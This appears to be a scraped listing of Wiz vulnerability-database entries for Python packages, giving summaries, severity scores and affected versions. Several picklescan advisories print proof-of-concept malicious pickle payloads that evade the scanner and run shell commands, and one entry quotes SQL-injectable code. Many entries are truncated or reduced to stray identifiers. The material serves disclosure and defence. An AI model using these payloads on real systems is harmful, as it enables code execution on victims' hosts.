Linux Severity MEDIUM Has Fix Added at: Mar 29, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 02, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-21872 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21872 [MEDIUM] CVE-2026-21872 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21872 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0.
Source : NVD
## 6.1
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 11, 2026
Wiz
CVE-2025-11157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-11157 [HIGH] CVE-2025-11157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11157 :
Python vulnerability analysis and mitigation
feast/sdk/python/feast/infra/compute_engines/kubernetes/main.py
yaml.load(..., Loader=yaml.Loader)
/var/feast/feature_store.yaml
/var/feast/materialization_config.yaml
Source : NVD
## 7.8
Score
Published January 1, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 50.4
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
feast
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 02, 2026
Wiz
CVE-2025-68142 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2025-68142 [LOW] CVE-2025-68142 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68142 :
Python vulnerability analysis and mitigation
Python-Markdown
pymdownx.blocks.caption
pymdownx.blocks.caption
Source : NVD
## 2.7
Score
Published December 16, 2025
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pymdown-extensions
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Dec 18, 2025
Echo Severity MEDIUM No Fix Added at: Dec 18, 2025
pip Severity LOW Has Fix Added at: Dec 17, 2025
Wiz
CVE-2026-33123 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-33123 [MEDIUM] CVE-2026-33123 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33123 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Versions prior to 6.9.1 allow an attacker to craft a malicious PDF which leads to long runtimes and/or large memory usage. Exploitation requires accessing an array-based stream with many entries. This issue has been fixed in version 6.9.1.
Source : NVD
## 5.1
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Mar 24, 2026
Debian 11, 12, 1
Wiz
CVE-2025-67743 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2025-67743 [MEDIUM] CVE-2025-67743 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67743 :
Python vulnerability analysis and mitigation
Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9.
Source : NVD
## 6.5
Score
Published December 23, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Wiz
GHSA-9m3x-qqw2-h32h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9m3x-qqw2-h32h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9m3x-qqw2-h32h :
Python vulnerability analysis and mitigation
## Summary
An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source.
## Details
eval
getattr
## PoC
```python
import builtins


class EvilClass:
    @staticmethod
    def _obfuscated_eval(payload):
        getattr(builtins, "eval")(payload)

    def __reduce__(self):
        payload = "__import__('os').system('echo \"successful attack\"')"
        return self._obfuscated_eval, (payload,)
```
## Impact
Who is impacted?
Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.
What is the impact?
Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is
Wiz
CVE-2025-68480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68480 [MEDIUM] CVE-2025-68480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68480 :
Python vulnerability analysis and mitigation
Marshmallow is a lightweight library for converting complex objects to and from simple Python datatypes. In versions from 3.0.0rc1 to before 3.26.2 and from 4.0.0 to before 4.1.2, Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time. This issue has been patched in version 3.26.2 and 4.1.2.
Source : NVD
## 5.3
Score
Published December 22, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.1
Exploitation Probability (EPSS) 0.1
Wiz
GHSA-9rwj-6rc7-p77c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-9rwj-6rc7-p77c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9rwj-6rc7-p77c :
Python vulnerability analysis and mitigation
## Context
A SQL injection vulnerability exists in LangGraph's SQLite checkpoint implementation that allows attackers to manipulate SQL queries through metadata filter keys. This affects applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations.
## Impact
Attackers who control metadata filter keys can execute arbitrary SQL queries against the database.
## Root Cause
_metadata_predicate()
```python
# VULNERABLE CODE (before fix)
for query_key, query_value in metadata_filter.items():
    operator, param_value = _where_value(query_value)
    predicates.append(
        f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
    )
    param_values.append(param_value)
```
While filter
Wiz
GHSA-v7cf-c9rm-wm3j Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-v7cf-c9rm-wm3j Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-v7cf-c9rm-wm3j :
Python vulnerability analysis and mitigation
## Summary
JustHTML.__init__()
TreeBuilder.finish()
_populate_selectedcontent()
_find_elements()
_find_element()
RecursionError
## Details
TreeBuilder.finish()
treebuilder.py#L476
_populate_selectedcontent(self.document)
_populate_selectedcontent()
treebuilder.py#L1243
_find_elements()
treebuilder.py#L1280
```python
def _find_elements(self, node: Any, name: str, result: list[Any]) -> None:
    """Recursively find all elements with given name."""
    if node.name == name:
        result.append(node)
    if node.has_child_nodes():
        for child in node.children:
            self._find_elements(child, name, result)  # recursive call
```
RecursionError
JustHTML(html)
tokenizer.run()
tree_builder.finish()
_populate_selectedcontent(document)
_find_el
Wiz
GHSA-7wx9-6375-f5wh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-7wx9-6375-f5wh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-7wx9-6375-f5wh :
Python vulnerability analysis and mitigation
## Summary
profile.Profile.run
profile.Profile.runctx
profile.run()
profile.run(statement)
exec()
"Profile.run"
"run"
## Severity
exec()
## Affected Versions
picklescan v1.0.3 (latest — the profile entries were added in recent versions)
Earlier versions also affected (profile not blocked at all)
## Details
## Root Cause
scanner.py
profile
"profile": {"Profile.run", "Profile.runctx"},
profile.run
module = "profile"
name = "run"
elif unsafe_filter is not None and (unsafe_filter == "*" or g.name in unsafe_filter):
"run"
{"Profile.run", "Profile.runctx"}
"run" != "Profile.run"
profile.run()
```python
# From Python's Lib/profile.py
def run(statement, filename=None, sort=-1):
    prof = Profile()
    try:
```
pro
Wiz
CVE-2026-1709 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-1709 [CRITICAL] CVE-2026-1709 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1709 :
Python vulnerability analysis and mitigation
A flaw was found in Keylime. The Keylime registrar, since version 7.12.0, does not enforce client-side Transport Layer Security (TLS) authentication. This authentication bypass vulnerability allows unauthenticated clients with network access to perform administrative operations, including listing agents, retrieving public Trusted Platform Module (TPM) data, and deleting agents, by connecting without presenting a client certificate.
Source : NVD
## 9.8
Score
Published February 6, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
Python
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Wiz
CVE-2025-11687 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-11687 [MEDIUM] CVE-2025-11687 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11687 :
Python vulnerability analysis and mitigation
A flaw was found in gi-docgen. This vulnerability allows arbitrary JavaScript execution in the context of the page — enabling DOM access, session cookie theft and other client-side attacks — via a crafted URL that supplies a malicious value to the q GET parameter (reflected DOM XSS).
Source : NVD
## 6.1
Score
Published January 26, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gi-docgen
gi-docgen-doc
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Oct 15, 2
Wiz
CVE-2026-33154 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33154 [HIGH] CVE-2026-33154 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33154 :
Python vulnerability analysis and mitigation
dynaconf is a configuration management tool for Python. Prior to version 3.2.13, Dynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @Jinja resolver. When the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment. This issue has been patched in version 3.2.13.
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2026-33310 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33310 [HIGH] CVE-2026-33310 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33310 :
Python vulnerability analysis and mitigation
Intake is a package for finding, investigating, loading and disseminating data. Prior to version 2.0.9, the shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell( ), the command may be executed when the catalog source is accessed. This means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system. Version 2.0.9 mitigates the issue by making getshell False by default everywhere.
Source : NVD
## 8.8
Score
Published March 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2025-14546 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-14546 [MEDIUM] CVE-2025-14546 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14546 :
Python vulnerability analysis and mitigation
Versions of the package fastapi-sso before 0.19.0 are vulnerable to Cross-site Request Forgery (CSRF) due to the improper validation of the OAuth state parameter during the authentication callback. While the get_login_url method allows for state generation, it does not persist the state or bind it to the user's session. Consequently, the verify_and_process method accepts the state received in the query parameters without verifying it against a trusted local value. This allows a remote attacker to trick a victim into visiting a malicious callback URL, which can result in the attacker's account being linked to the victim's internal account.
Source : NVD
## 6.9
Score
Published December 19, 2025
Severity MEDIUM
Wiz
GHSA-97f8-7cmv-76j2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-97f8-7cmv-76j2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-97f8-7cmv-76j2 :
Python vulnerability analysis and mitigation
## Summary
scan_pytorch
picklescan
pickletools.genops(data)
magic_number
opcode.name
INT
LONG
magic_number
magic_code
PyTorch
eval
__reduce__
pickletools.genops(data)
magic_code
INT
LONG
pickle_module.load()
magic_code
## PoC
## Attack Step 1
We can edit the source code of the function _legacy_save() as follows:
```python
class payload:
    def __reduce__(self):
        return (eval, ('MAGIC_NUMBER',))

pickle_module.dump(payload(), f, protocol=pickle_protocol)
```
## Attack Step 2
PyTorch
payload.pt
```python
import torch

class payload:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/hacked',))

torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)
```
## Picklescan result
ERR
Wiz
CVE-2026-32889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-32889 [MEDIUM] CVE-2026-32889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32889 :
Python vulnerability analysis and mitigation
tinytag is a Python library for reading audio file metadata. Version 2.2.0 allows an attacker who can supply MP3 files for parsing to trigger a non-terminating loop while the library parses an ID3v2 SYLT (synchronized lyrics) frame. In server-side deployments that automatically parse attacker-supplied files, a single 498-byte MP3 can cause the parsing operation to stop making progress and remain busy until the worker or process is terminated. The root cause is that _parse_synced_lyrics assumes _find_string_end_pos always returns a position greater than the current offset. That assumption is false when no string terminator is present in the remaining frame content. This issue has been fixed in version 2.2.1.
Source : NVD
Wiz
CVE-2026-24123 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-24123 [HIGH] CVE-2026-24123 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24123 :
Python vulnerability analysis and mitigation
bentofile.yaml
description
docker.setup_script
docker.dockerfile_template
conda.environment_yml
Source : NVD
## 6.5
Score
Published January 26, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bentoml
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 27, 2026
Wiz
CVE-2026-27194 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-27194 [HIGH] CVE-2026-27194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27194 :
Python vulnerability analysis and mitigation
D-Tale is a visualizer for pandas data structures. Versions prior to 3.20.0 are vulnerable to Remote Code Execution through the /save-column-filter endpoint. Users hosting D-Tale publicly can be vulnerable to remote code execution allowing attackers to run malicious code on the server. This issue has been fixed in version 3.20.0.
Source : NVD
## 8.1
Score
Published February 21, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 34.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
dtale
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 2
Wiz
CVE-2026-24049 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-24049 [HIGH] CVE-2026-24049 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24049 :
Python vulnerability analysis and mitigation
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.
Source : NVD
## 5.5
Wiz
CVE-2026-35175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35175 [HIGH] CVE-2026-35175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35175 :
Python vulnerability analysis and mitigation
Ajenti is a Linux and BSD modular server admin panel. Prior to 2.2.15, an authenticated user (using the auth_users plugin authentication method) could install a custom package even if this user is not superuser. This vulnerability is fixed in 2.2.15.
Source : NVD
## 7.2
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ajenti-panel
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-33125 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33125 [HIGH] CVE-2026-33125 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33125 :
Python vulnerability analysis and mitigation
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. In versions 0.16.2 and below, users with the viewer role can delete admin and low-privileged user accounts. Exploitation can lead to DoS and affect data integrity. This issue has been patched in version 0.16.3.
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
frigate
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 19, 2026
Wiz
GHSA-955r-x9j8-7rhh Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-955r-x9j8-7rhh Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-955r-x9j8-7rhh :
Python vulnerability analysis and mitigation
## Summary
A bypass of Picklescan uses _operator.methodcaller, a built-in Python library function, to execute code from remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the _operator.methodcaller function in the __reduce__ method.
Then, after the victim checks whether the pickle file is safe using the Picklescan library and the library does not detect any dangerous functions, pickle.load() loads this malicious pickle file, leading to remote code execution.
## PoC
```python
import pickle
import pickletools

opcode2 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
methodcaller
(Vsystem
Vecho "pwned by _operator.methodcaller"
tR(g0
tR.'''
```
pick
Wiz
CVE-2026-27695 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27695 [MEDIUM] CVE-2026-27695 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27695 :
Python vulnerability analysis and mitigation
namespace/ENTITY#{id}
Source : NVD
## 5.3
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
zae-limiter
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
CVE-2026-34824 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34824 [HIGH] CVE-2026-34824 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34824 :
Python vulnerability analysis and mitigation
Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.
Source : NVD
## 7.5
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Wiz
CVE-2026-33044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33044 [HIGH] CVE-2026-33044 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33044 :
Python vulnerability analysis and mitigation
Home Assistant is open source home automation software that puts local control and privacy first. Starting in version 2020.02 and prior to version 2026.01, an authenticated party can add a malicious name to their device entity, allowing for Cross-Site Scripting attacks against anyone who can see a dashboard with a Map-card which includes that entity. It requires that the victim hovers over an information point. Version 2026.01 fixes the issue.
Source : NVD
## 7.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Wiz
CVE-2026-33314 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33314 [MEDIUM] CVE-2026-33314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33314 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.
Source : NVD
## 6.5
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-27645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27645 [MEDIUM] CVE-2026-27645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27645 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. In versions prior to 0.54.1, the RSS single-watch endpoint reflects the UUID path parameter directly in the HTTP response body without HTML escaping. Since Flask returns text/html by default for plain string responses, the browser parses and executes injected JavaScript. Version 0.54.1 contains a fix for the issue.
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 70.2
Exploitation Probability (EPSS) 0.6
Wiz
GHSA-8h88-gxp3-j7pg Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-8h88-gxp3-j7pg Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-8h88-gxp3-j7pg :
Python vulnerability analysis and mitigation
## Summary
PublicKeyBundle.from_dict()
openssl_encrypt/modules/key_bundle.py
verify_signature()
to_identity()
Identity
## Affected Code
```python
@classmethod
def from_dict(cls, data: Dict) -> "PublicKeyBundle":
    """
    SECURITY: Does NOT verify signature. Call verify_signature() after creation.
    """
    # Creates bundle without verification
```
## Impact
from_dict()
to_identity()
verify_signature()
key_resolver.py
## Recommended Fix
verified
PublicKeyBundle
to_identity()
to_identity()
verify_signature()
from_dict()
## Fix
f4a1ba6
releases/1.4.x
Source : NVD
## 6.6
Score
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2025-70559 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-70559 [HIGH] CVE-2025-70559 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70559 :
Python vulnerability analysis and mitigation
pdfminer.six before 20251230 contains an insecure deserialization vulnerability in the CMap loading mechanism. The library uses Python pickle to deserialize CMap cache files without validation. An attacker with the ability to place a malicious pickle file in a location accessible to the application can trigger arbitrary code execution or privilege escalation when the file is loaded by a trusted process. This is caused by an incomplete patch to CVE-2025-64512.
Source : NVD
## 6.5
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-26717 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-26717 [MEDIUM] CVE-2026-26717 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26717 :
Python vulnerability analysis and mitigation
An issue was found in OpenFUN Richie (LMS) in src/richie/apps/courses/api.py. The application used the non-constant-time == operator for HMAC signature verification in the sync_course_run_from_request function. This allows remote attackers to forge valid signatures and bypass authentication by measuring response time discrepancies.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
richie
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2
Wiz
CVE-2026-21889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-21889 [LOW] CVE-2026-21889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21889 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. Prior to 5.15.2, the screenshot images were served directly by the HTTP server without proper access control. This could allow an unauthenticated user to access screenshots after guessing their filename. This vulnerability is fixed in 5.15.2.
Source : NVD
## 2.3
Score
Published January 14, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 14, 2026
Wiz
CVE-2026-23490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-23490 [HIGH] CVE-2026-23490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23490 :
Python vulnerability analysis and mitigation
pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.
Source : NVD
## 7.5
Score
Published January 16, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
fence-agents-bladecenter
Sources
NVD
AlmaLinux 8 Severity HIGH Has Fix Added at: Feb 11, 2026
AlmaLinux 9 Severity HIGH Has Fix Ad
Wiz
CVE-2025-65430 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-65430 [MEDIUM] CVE-2025-65430 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65430 :
Python vulnerability analysis and mitigation
An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed out tokens for that user while the account was still active had no effect. Fixed: the access/refresh tokens are now rejected.
Source : NVD
## 5.4
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
django-allauth
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16, 2025
Debian 14 Severity MEDIUM Has Fix Added at: D
Wiz
CVE-2026-25136 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-25136 [HIGH] CVE-2026-25136 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25136 :
Python vulnerability analysis and mitigation
